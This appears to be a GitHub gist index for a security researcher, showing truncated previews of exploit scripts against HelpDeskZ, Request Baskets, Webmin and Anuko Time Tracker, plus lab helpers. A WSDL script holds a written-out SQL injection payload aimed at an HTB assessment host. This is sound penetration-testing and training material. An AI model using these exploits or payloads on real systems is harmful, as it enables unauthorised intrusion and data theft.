Skip to content

Instantly share code, notes, and snippets.

View rudSarkar's full-sized avatar
:electron:
Negatively Charged

Rudra Sarkar rudSarkar

:electron:
Negatively Charged
157 followers · 99 following
View GitHub Profile
@rudSarkar
rudSarkar / test.json
Created September 14, 2025 07:46
{
"message": "Bypassed the localhost to gist.github.com"
}
@rudSarkar
rudSarkar / jwk.json
Last active September 12, 2025 11:28
jwtks
{
"keys": [
{
"alg": "RS256",
"kty": "RSA",
"use": "sig",
"kid": "c352e221-4437-47e7-b5c0-7832acbaeb38",
"n": "voxh3CBHKablzbZLfJSXzZkSCWBTZMOz7mp3udKVevZGt-VUkNx4eEMHlKE1DzphqDNPWnPqHTKCTyVVCB69NIu5T3MdUIzXQ8oI8hoKrKsTcWkwggjTbRQYCeVMwEdO0KgCM61fcO6tdOh_kU4ToodM0_6ERGqag-0FPF8JXC7VZ9c9FaYo41lpLqnqrU2yxcGa2Bv7KfcTNaW92GxnGORisvcoxADKrdFRN6BKfgADZEH_sdNKfFHjdYizkGkx-8iKwpsoNZfaUrWycNmplEPof-9G7-d1G1dAU5QVgQ6I2mcV5jbWdU4B1PGh7aeipB1UbwIJR2scCiVhQZ8_Hw",
"e": "AQAB"
}
@rudSarkar
rudSarkar / helpdeskz_v1.0.2_exploit.py
Created August 29, 2025 16:59
HelpDeskZ <= v1.0.2 - Unauthenticated Shell Upload
#!/usr/bin/python3
# reference: https://gist.github.com/SakiiR/b005c6d1c955502cfe1d1dfc959cc0f7
import sys
import requests
import hashlib
from time import time
def md5(data):
@rudSarkar
rudSarkar / request_baskets_v1.2.1_ssrf.py
Last active August 29, 2025 14:58
Request Baskets v1.2.1 SSRF Exploit
#!/usr/bin/python3
# https://nvd.nist.gov/vuln/detail/CVE-2023-27163
# https://github.com/darklynx/request-baskets
import argparse
import random
import string
import requests
@rudSarkar
rudSarkar / webmin_rce.py
Created August 13, 2025 06:48
CVE-2022-36446 - Webmin 1.996 Remote Code Execution
# Exploit Title: Webmin < 1.997 - Remote Code Execution (RCE) (Authenticated)
# Date: 2022-07-25
# Exploit Author: Emir Polat
# Vendor Homepage: https://www.webmin.com/
# Software Link: https://www.webmin.com/download.html
# Version: < 1.997
# Tested On: Version 1.996 - Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-122-generic x86_64)
# CVE: CVE-2022-36446
import argparse
@rudSarkar
rudSarkar / anuko_time_tracker_sqli_auth.py
Created August 13, 2025 06:32
# Exploit Title: Anuko Time Tracker - SQLi (Authenticated)
# Date: 2022-05-03
# Exploit Author: Altelus
# Vendor Homepage: https://www.anuko.com/
# Software Link: https://github.com/anuko/timetracker/tree/0924ef499c2b0833a20c2d180b04fa70c6484b6d
# Version: Anuko Time Tracker 1.20.0.5640
# Tested on: Linux
# CVE : CVE-2022-24707
# Reference: https://www.exploit-db.com/exploits/50915
@rudSarkar
rudSarkar / wsdl_sql_injection.py
Created August 10, 2025 19:35
Web Service & API Attacks - Skills Assessment
"""
Submit the password of the user that has a username of "admin". Answer format: FLAG{string}. Please note that the service will respond successfully only after submitting the proper SQLi payload, otherwise it will hang or throw an error.
"""
import requests
url = "http://10.129.247.185:3002/wsdl"
username = "admin' or '1'='"
password = "password"
@rudSarkar
rudSarkar / docker-compose.yaml
Created July 31, 2025 04:44
Bloodhound docker
# Copyright 2023 Specter Ops, Inc.
#
# Licensed under the Apache License, Version 2.0
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
@rudSarkar
rudSarkar / main.go
Created April 20, 2025 15:41
Add missing one number/word at the end of the md5, it's for HTB Skills Assessment - Using Web Proxies
package main
import (
"encoding/base64"
"encoding/hex"
"fmt"
"strings"
)
func main() {
@rudSarkar
rudSarkar / install_python2.7.sh
Created April 16, 2025 09:17
Install python2.7 from source
#!/bin/bash
"""
Run this script as sudo
"""
wget https://www.python.org/ftp/python/2.7/Python-2.7.tgz
tar xvzf Python-2.7.tgz
cd Python-2.7/
./configure